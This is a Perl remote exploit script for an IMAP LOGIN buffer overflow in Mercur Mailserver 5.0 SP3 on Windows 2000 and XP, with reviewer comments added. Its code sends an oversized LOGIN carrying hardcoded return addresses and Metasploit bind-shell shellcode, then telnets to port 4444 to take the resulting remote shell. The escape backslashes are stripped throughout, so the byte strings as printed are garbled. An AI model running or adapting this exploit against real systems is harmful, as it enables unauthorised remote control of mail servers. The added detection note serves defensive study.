# Title : Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
# Published : 2006-09-11
# Author : Jacopo Cervini
#!/usr/bin/perl
# Tested on Windows 2k SP4 Italian and English version and Win XP Pro SP2 Italian and English version
# Perl script based on Sami FTP server remote exploit by Critical Security
# http://www.securityfocus.com/bid/17138
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
# Flat script: builds an IMAP "a001 LOGIN" request whose argument is a
# fixed repetition of a pad string, a selectable return-address value and a
# payload string, sends it twice to the target, then runs telnet against
# port 4444 of the same host.
#
# NOTE(review): no `use strict`/`use warnings`; $exploit below is an
# undeclared package global.
#
# Usage banner when fewer than two arguments are given.  The script does
# not exit here; it falls through to the defaults assigned below.
if (@ARGV < 2) {
print "--------------------------------------------------------------------n";
print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddressn";
print " Return address: n";
print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Versionn";
print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Versionn";
print " If values not specified, Windows 2k Sp4 will be used.n";
print " Example : ./mercur-login.pl -h127.0.0.1 -o1n";
print "--------------------------------------------------------------------n";
}
# Defaults: loopback host, IMAP port 143.
my $host = "127.0.0.1";
my $port = 143;
my $reply;
my $request;   # declared but never used below
# $pad is the literal string "x90" repeated 268 times, exactly as printed
# on this page.
my $pad = "x90"x268;
my $eip = "x87xd0x58x02"; # default eip is for Win2k SP4
# Argument parsing by regex over @ARGV.  The -h pattern uses unescaped '.'
# and greedy '.*', so it does not actually validate an IPv4 address; any
# text after -h is accepted as $host.  The -o pattern likewise takes
# arbitrary text.
foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*).(.*).(.*).(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}
# Map the -o selector onto one of the two fixed values; any other selector
# is left as the raw text captured above.  (Switch.pm is a source filter,
# not a core module.)
switch ($eip) {
case 1 { $eip = "x87xd0x58x02" } # Windows Win2k SP4 English and Italian version
case 2 { $eip = "x83xd0x0cx02" } # Windows XP SP2 English and Italian version
}
#Metasploit bind 4444 shellcode
my $shellcode=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" .
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66" .
"x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6" .
"x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa" .
"x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f" .
"x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb" .
"x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba" .
"x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb" .
"xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc" .
"xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61" .
"x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70" .
"x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44" .
"x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7" .
"x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69" .
"xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9" .
"xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0" .
"x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3" .
"x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7" .
"x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0" .
"xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67" .
"x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1" .
"xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0" .
"x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88" .
"x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d" .
"xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95" .
"x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2";
# TCP connect to $host:$port; the constructor returns undef on failure.
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!n";
# Read (up to 1024 bytes of) the server greeting and echo it.
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
# First request: tag, LOGIN, pad, return-address value, payload.
# Detection note: the observable artifact on the wire is a single IMAP
# LOGIN command with a username argument several hundred bytes long,
# followed by a client connection to TCP/4444 on the mail host.
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."rn";
send $socket, $exploit, 0;
print "[+] sending 1st chunkn";
# Second request: same shape without the payload.
$exploit = "a001 LOGIN " . $pad. $eip ."rn";
send $socket, $exploit, 0;
print "[+] sending 2nd chunkn";
print " + connecting port 4444 of $host ...n";
# system() in shell form: $host (taken unvalidated from @ARGV above) is
# interpolated straight into the command line on the operator's machine.
system("telnet $host 4444");
close $socket;
exit;